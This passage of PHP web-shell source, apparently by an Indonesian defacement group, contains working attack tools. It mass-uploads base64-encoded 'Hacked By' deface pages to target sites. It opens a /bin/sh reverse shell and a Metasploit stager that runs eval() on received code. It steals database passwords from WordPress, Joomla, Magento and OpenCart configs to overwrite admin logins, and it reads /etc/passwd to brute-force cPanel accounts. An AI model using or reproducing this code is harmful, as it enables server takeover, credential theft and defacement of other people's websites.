jYiPjxjZW50ZXI+X1R1YW4yRmF5XyAtIFl1a2lub3NoaXRhIDQ3IC0gVE1fNDA0IDxicj4gU25vb3plIC0gTHlvbmMgLSBFN0JfNDA0IC0gRGFya1RlcnJvcml6dCA8YnI+IC4vWmVybypBbmdlbCAtIDVpTk9OIU1PVTIzIC0gTXIuWE00MDRSUyEgLSAuL1IxNV9VVEQgLSBFdmlsQ2xvd24gPGJyPiB1dHJhZ2VvdXNFbmdrdXMgLSAzNERfU0wzM1AgLSBTZWN0b3IgVi4yIC0gTXIuU3BvbmdlYm9iIDxicj5TaGFkb3dIZSpydCAtIEN5YmVyR2hvc3QuMTcgLSBBbmQgQWxsIE1lbWJlciBvZiBHYXJ1ZGEgU2VjdXJpdHkgSGFja2Vy";
  1792.         $decode_isi = base64_decode($isi_nama_doang);
  1793.         $encode = base64_encode($global);
  1794.         $ss = fopen($global,"w");
  1795.         fputs($ss, $decode_isi);
  1796.         echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  1797.         echo "Done index.php<br>";
  1798.         $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
  1799.         $post1 = array(
  1800.                 "target" => "l1_$encode",
  1801.                 "content" => "$decode_isi",);
  1802.         $post2 = array( "upload[]" => "@$global",);
  1803.         $output_mkfile = ngirim("$korban", $post1);
  1804.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  1805.             }
  1806.         }
  1807. ?>
  1808. <form method="post">
  1809. <input type="submit" name="s" value="lol.php">
  1810. </form>
  1811. <?php
  1812. $targets = explode("\r\n", $_POST['targets']);
  1813. if($_POST['s']) {
  1814.     foreach($targets as $korba) {
  1815.         $globa = "lol.php";
  1816.         $isi_nama = "PHRpdGxlPkxvY2tlZDwvdGl0bGU+DQo8c3R5bGU+DQpib2R5ew0KdGV4dC1zaGFkb3c6MnB4IDJweCAxcHggYmx1ZTsNCn0NCmh0bWwgew0KCSBiYWNrZ3JvdW5kOiB1cmwoaHR0cHM6Ly9zY29udGVudC1zaW42LTEueHguZmJjZG4ubmV0L3YvdDEuMC0wL3M1NTJ4NDE0LzE1OTY1NTMxXzE5MTc4Nzg2MDUxMDY2MzNfODE4MDM5MjkyMzE4MzIyMzcxMF9uLmpwZz9vaD1kZDUwNGM1YTEyODU3MzFiMTQ0MDg0YWUzZGVkZDkyMSZvZT01OTExOEI2OSkgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIgZml4ZWQ7IA0KICAtd2Via2l0LWJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogIC1tb3otYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICBjb2xvcjogI2ZmZmZmZjsNCiAgICBmb250LWZhbWlseTogJ1VidW50dSc7DQoJZm9udC1zaXplOiAxM3B4Ow0KCXdpZHRoOiAxMDAlOw0KfQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+PHN0cm9uZz48Zm9udCBzaXplPSI0Ij5IYWNrZWQgQnkgR2FydWRhIFNlY3VyaXR5IEhhY2tlcjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PGNlbnRlcj4NCjxzY3JpcHQ+dmFyIGc9NTAsZj1uZXcgQXJyYXkoIiNBQUFBQ0MiLCIjREREREZGIiwiI0NDQ0NERCIsIiNGM0YzRjMiLCIjRjBGRkZGIiksZT1uZXcgQXJyYXkoIkFyaWFsIEJsYWNrIiwiQXJpYWwgTmFycm93IiwiVGltZXMiLCJDb21pYyBTYW5zIE1TIiksZD0iKiIsbT0wLjYsYT0yMixiPTgsYz0xLGo9bmV3IEFycmF5KCksayxsLHgsbj1uZXcgQXJyYXkoKSxvPW5ldyBBcnJheSgpLHA9bmV3IEFycmF5KCkscT1uYXZpZ2F0b3IudXNlckFnZW50LHI9ZG9jdW1lbnQuYWxsJiZkb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIXEubWF0Y2goL09wZXJhLykscz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCx1PXEubWF0Y2goL09wZXJhLyksdD1yfHxzfHx1O2Z1bmN0aW9uIHkoeil7cmV0dXJuIE1hdGguZmxvb3IoeipNYXRoLnJhbmRvbSgpKX1mdW5jdGlvbiB2KCl7aWYocnx8dSl7az1kb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodDtsPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7fWVsc2UgaWYocyl7az13aW5kb3cuaW5uZXJIZWlnaHQ7bD13aW5kb3cuaW5uZXJXaWR0aDt9dmFyIGg9YS1iO2ZvcihpPTA7aTw9ZztpKyspe29baV09MDtwW2ldPU1hdGgucmFuZG9tKCkqMTU7bltpXT0wLjAzK01hdGgucmFuZG9tKCkvMTA7altpXT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicyIraSk7altpXS5zdHlsZS5mb250RmFtaWx5PWVbeShlLmxlbmd0aCldO2pbaV0uc2l6ZT15KGgpK2I7altpXS5zdHlsZS5mb250U2l6ZT1qW2ldLnNpemU7altpXS5zdHlsZS5jb2xvcj1mW3koZi5sZW5ndGgpXTtqW2ldLnNpbms9bSpqW2ldLnNpemUvNTtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fTtpZihjPT00KXtqW2ldLnBvc3g9eShsLzItaltpXS5zaXplKStsLzJ9altpXS5wb3N5PXkoMiprLWstMipqW2ldLnNpemUpO2pbaV0uc3R5bGUubGVmdD1qW2ldLnBvc3g7altpXS5zdHlsZS50b3A9altpXS5wb3N5fXcoKX1mdW5jdGlvbiB3KCl7Zm9yKGk9MDtpPD1nO2krKyl7b1tpXSs9bltpXTtqW2ldLnBvc3krPWpbaV0uc2luaztqW2ldLnN0eWxlLmxlZnQ9altpXS5wb3N4K3BbaV0qTWF0aC5zaW4ob1tpXSk7altpXS5zdHlsZS50b3A9altpXS5wb3N5O2lmKGpbaV0ucG9zeT49ay0yKmpbaV0uc2l6ZXx8cGFyc2VJbnQoaltpXS5zdHlsZS5sZWZ0KT4obC0zKnBbaV0pKXtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fWlmKGM9PTQpe2pbaV0ucG9zeD15KGwvMi1qW2ldLnNpemUpK2wvMn1qW2ldLnBvc3k9MH19dmFyIHg9c2V0VGltZW91dCgidygpIiw1MCl9Zm9yKGk9MDtpPD1nO2krKyl7ZG9jdW1lbnQud3JpdGUoIjxzcGFuIGlkPSdzIitpKyInIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt0b3A6LSIrYSsiJz4iK2QrIjwvc3Bhbj4iKX1pZih0KXt3aW5kb3cub25sb2FkPXZ9PC9zY3JpcHQ+PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7bGVmdDozNiU7dG9wOjQ2JSI+PC9kaXY+PHN0eWxlPjwvdGV4dGFyZWE+PGJyPjwvc3R5bGU+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj4NCjxmb250IHNpemU9IjYiPjxjZW50ZXI+X1R1YW4yRmF5XyAtIFl1a2lub3NoaXRhIDQ3IC0gVE1fNDA0IDxicj4gU25vb3plIC0gTHlvbmMgLSBFN0JfNDA0IC0gRGFya1RlcnJvcml6dCA8YnI+IC4vWmVybypBbmdlbCAtIDVpTk9OIU1PVTIzIC0gTXIuWE00MDRSUyEgLSAuL1IxNV9VVEQgLSBFdmlsQ2xvd24gPGJyPiB1dHJhZ2VvdXNFbmdrdXMgLSAzNERfU0wzM1AgLSBTZWN0b3IgVi4yIC0gTXIuU3BvbmdlYm9iIDxicj5TaGFkb3dIZSpydCAtIEN5YmVyR2hvc3QuMTcgLSBBbmQgQWxsIE1lbWJlciBvZiBHYXJ1ZGEgU2VjdXJpdHkgSGFja2Vy";
  1817.         $decode_isi = base64_decode($isi_nama);
  1818.         $encode = base64_encode($globa);
  1819.         $ss = fopen($globa,"w");
  1820.         fputs($ss, $decode_isi);
  1821.         echo "[+] <a href='$korban' targets='_blank'>$korba</a> <br>";
  1822.         echo "Done lol.php<br>";
  1823.         $url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw";
  1824.         $post1 = array(
  1825.                 "targets" => "l1_$encode",
  1826.                 "content" => "$decode_isi",);
  1827.         $post2 = array( "upload[]" => "@$globa",);
  1828.         $output_mkfil = ngirim("$korban", $post1);
  1829.             $upload_as = ngirim("$korban?cmd=upload", $post2);
  1830.             }
  1831.         }
  1832.  
  1833. } elseif($_GET['do'] == 'tool') {
  1834. error_reporting(0);
  1835. function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
  1836. $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&amp;x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
  1837. echo $s_result;
  1838. if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
  1839. if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
  1840. if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
  1841. if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
  1842. if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
  1843. umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
  1844. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  1845. $process = proc_open($shell, $descriptorspec, $pipes);
  1846. if(!is_resource($process)) exit(1);
  1847. stream_set_blocking($pipes[0], 0);
  1848. stream_set_blocking($pipes[1], 0);
  1849. stream_set_blocking($pipes[2], 0);
  1850. stream_set_blocking($sock, 0);
  1851. while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  1852. if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
  1853. if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
  1854. if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
  1855. } elseif($_GET['do'] == 'auto_edit_user') {
  1856.     if($_POST['hajar']) {
  1857.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1858.             echo "username atau password harus lebih dari 6 karakter";
  1859.         } else {
  1860.             $user_baru = $_POST['user_baru'];
  1861.             $pass_baru = md5($_POST['pass_baru']);
  1862.             $conf = $_POST['config_dir'];
  1863.             $scan_conf = scandir($conf);
  1864.             foreach($scan_conf as $file_conf) {
  1865.                 if(!is_file("$conf/$file_conf")) continue;
  1866.                 $config = file_get_contents("$conf/$file_conf");
  1867.                 if(preg_match("/JConfig|joomla/",$config)) {
  1868.                     $dbhost = ambilkata($config,"host = '","'");
  1869.                     $dbuser = ambilkata($config,"user = '","'");
  1870.                     $dbpass = ambilkata($config,"password = '","'");
  1871.                     $dbname = ambilkata($config,"db = '","'");
  1872.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1873.                     $prefix = $dbprefix."users";
  1874.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1875.                     $db = mysql_select_db($dbname);
  1876.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1877.                     $result = mysql_fetch_array($q);
  1878.                     $id = $result['id'];
  1879.                     $site = ambilkata($config,"sitename = '","'");
  1880.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1881.                     echo "Config => ".$file_conf."<br>";
  1882.                     echo "CMS => Joomla<br>";
  1883.                     if($site == '') {
  1884.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1885.                     } else {
  1886.                         echo "Sitename => $site<br>";
  1887.                     }
  1888.                     if(!$update OR !$conn OR !$db) {
  1889.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1890.                     } else {
  1891.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1892.                     }
  1893.                     mysql_close($conn);
  1894.                 } elseif(preg_match("/WordPress/",$config)) {
  1895.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1896.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1897.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1898.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1899.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1900.                     $prefix = $dbprefix."users";
  1901.                     $option = $dbprefix."options";
  1902.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1903.                     $db = mysql_select_db($dbname);
  1904.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1905.                     $result = mysql_fetch_array($q);
  1906.                     $id = $result[ID];
  1907.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1908.                     $result2 = mysql_fetch_array($q2);
  1909.                     $target = $result2[option_value];
  1910.                     if($target == '') {
  1911.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1912.                     } else {
  1913.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1914.                     }
  1915.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1916.                     echo "Config => ".$file_conf."<br>";
  1917.                     echo "CMS => Wordpress<br>";
  1918.                     echo $url_target;
  1919.                     if(!$update OR !$conn OR !$db) {
  1920.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1921.                     } else {
  1922.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1923.                     }
  1924.                     mysql_close($conn);
  1925.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1926.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1927.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1928.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1929.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1930.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1931.                     $prefix = $dbprefix."admin_user";
  1932.                     $option = $dbprefix."core_config_data";
  1933.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1934.                     $db = mysql_select_db($dbname);
  1935.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1936.                     $result = mysql_fetch_array($q);
  1937.                     $id = $result[user_id];
  1938.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1939.                     $result2 = mysql_fetch_array($q2);
  1940.                     $target = $result2[value];
  1941.                     if($target == '') {
  1942.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1943.                     } else {
  1944.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1945.                     }
  1946.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1947.                     echo "Config => ".$file_conf."<br>";
  1948.                     echo "CMS => Magento<br>";
  1949.                     echo $url_target;
  1950.                     if(!$update OR !$conn OR !$db) {
  1951.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1952.                     } else {
  1953.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1954.                     }
  1955.                     mysql_close($conn);
  1956.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1957.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1958.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1959.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1960.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1961.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1962.                     $prefix = $dbprefix."user";
  1963.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1964.                     $db = mysql_select_db($dbname);
  1965.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1966.                     $result = mysql_fetch_array($q);
  1967.                     $id = $result[user_id];
  1968.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1969.                     if($target == '') {
  1970.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1971.                     } else {
  1972.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1973.                     }
  1974.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1975.                     echo "Config => ".$file_conf."<br>";
  1976.                     echo "CMS => OpenCart<br>";
  1977.                     echo $url_target;
  1978.                     if(!$update OR !$conn OR !$db) {
  1979.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1980.                     } else {
  1981.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1982.                     }
  1983.                     mysql_close($conn);
  1984.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1985.                     $dbhost = ambilkata($config,'server = "','"');
  1986.                     $dbuser = ambilkata($config,'username = "','"');
  1987.                     $dbpass = ambilkata($config,'password = "','"');
  1988.                     $dbname = ambilkata($config,'database = "','"');
  1989.                     $prefix = "users";
  1990.                     $option = "identitas";
  1991.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1992.                     $db = mysql_select_db($dbname);
  1993.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1994.                     $result = mysql_fetch_array($q);
  1995.                     $target = $result[alamat_website];
  1996.                     if($target == '') {
  1997.                         $target2 = $result[url];
  1998.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1999.                         if($target2 == '') {
  2000.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2001.                         } else {
  2002.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2003.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2004.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2005.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2006.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2007.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2008.                             } else {
  2009.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2010.                             }
  2011.                         }
  2012.                     } else {
  2013.                         $cek_login = file_get_contents("$target/adminweb/");
  2014.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2015.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2016.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2017.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2018.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2019.                         } else {
  2020.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2021.                         }
  2022.                     }
  2023.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2024.                     echo "Config => ".$file_conf."<br>";
  2025.                     echo "CMS => Lokomedia<br>";
  2026.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2027.                         echo $url_target2;
  2028.                     } else {
  2029.                         echo $url_target;
  2030.                     }
  2031.                     if(!$update OR !$conn OR !$db) {
  2032.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2033.                     } else {
  2034.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2035.                     }
  2036.                     mysql_close($conn);
  2037.                 }
  2038.             }
  2039.         }
  2040.     } else {
  2041.         echo "<center>
  2042.         <h1>Auto Edit User Config</h1>
  2043.         <form method='post'>
  2044.         DIR Config: <br>
  2045.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2046.         Set User & Pass: <br>
  2047.         <input type='text' name='user_baru' value='XvC404' placeholder='user_baru'><br>
  2048.         <input type='text' name='pass_baru' value='XvC404' placeholder='pass_baru'><br>
  2049.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2050.         </form>
  2051.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2052.         ";
  2053.     }
  2054. } elseif($_GET['do'] == 'cpanel') {
  2055.     if($_POST['crack']) {
  2056.         $usercp = explode("\r\n", $_POST['user_cp']);
  2057.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2058.         $i = 0;
  2059.         foreach($usercp as $ucp) {
  2060.             foreach($passcp as $pcp) {
  2061.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2062.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2063.                     } else {
  2064.                         $_SESSION[$ucp] = "1";
  2065.                         $_SESSION[$pcp] = "1";
  2066.                         if($ucp == '' || $pcp == '') {
  2067.                            
  2068.                         } else {
  2069.                             $i++;
  2070.                             if(function_exists('posix_getpwuid')) {
  2071.                                 $domain_cp = file_get_contents("/etc/named.conf");
  2072.                                 if($domain_cp == '') {
  2073.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  2074.                                 } else {
  2075.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2076.                                     foreach($domains_cp[1] as $dj) {
  2077.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2078.                                         $user_cp_url = $user_cp_url['name'];
  2079.                                         if($user_cp_url == $ucp) {
  2080.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  2081.                                             break;
  2082.                                         }
  2083.                                     }
  2084.                                 }
  2085.                             } else {
  2086.                                 $dom = "<font color=red>function is Disable by system</font>";
  2087.                             }
  2088.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  2089.                         }
  2090.                     }
  2091.                 }
  2092.             }
  2093.         }
  2094.         if($i == 0) {
  2095.         } else {
  2096.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Security Ghost Shell.</font>";
  2097.         }
  2098.     } else {
  2099.         echo "<center>
  2100.         <form method='post'>
  2101.         USER: <br>
  2102.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2103.         $_usercp = fopen("/etc/passwd","r");
  2104.         while($getu = fgets($_usercp)) {
  2105.             if($getu == '' || !$_usercp) {
  2106.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2107.             } else {
  2108.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2109.                 foreach($u[1] as $user_cp) {
  2110.                         if(is_dir("/home/$user_cp/public_html")) {
  2111.                             echo "$user_cp\n";
  2112.                     }
  2113.                 }
  2114.             }
  2115.         }
  2116.         echo "</textarea><br>
  2117.         PASS: <br>
  2118.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2119.         function cp_pass($dir) {
  2120.             $pass = "";
  2121.             $dira = scandir($dir);
  2122.             foreach($dira as $dirb) {
  2123.                 if(!is_file("$dir/$dirb")) continue;
  2124.                 $ambil = file_get_contents("$dir/$dirb");
  2125.                 if(preg_match("/WordPress/", $ambil)) {
  2126.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2127.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2128.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2129.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2130.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2131.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2132.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2133.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2134.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2135.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  2136.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  2137.                     if(preg_match('/"/', $pass1[1])) {
  2138.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2139.                         $pass .= $pass1[1]."\n";
  2140.                     } else {
  2141.                         $pass .= $pass1[1]."\n";
  2142.                     }
  2143.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2144.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2145.                 }
  2146.             }
  2147.             echo $pass;
  2148.         }
  2149.         $cp_pass = cp_pass($dir);
  2150.         echo $cp_pass;
  2151.         echo "</textarea><br>
  2152.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2153.         </form>
  2154.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2155.     }
  2156. } elseif($_GET['do'] == 'cpftp_auto') {
  2157.     if($_POST['crack']) {
  2158.         $usercp = explode("\r\n", $_POST['user_cp']);
  2159.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2160.         $i = 0;
  2161.         foreach($usercp as $ucp) {
  2162.             foreach($passcp as $pcp) {
  2163.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2164.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2165.                     } else {
  2166.                         $_SESSION[$ucp] = "1";
  2167.                         $_SESSION[$pcp] = "1";
  2168.                         if($ucp == '' || $pcp == '') {
  2169.                             //
  2170.                         } else {
  2171.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2172.                             $ftp_conn = ftp_connect($ip);
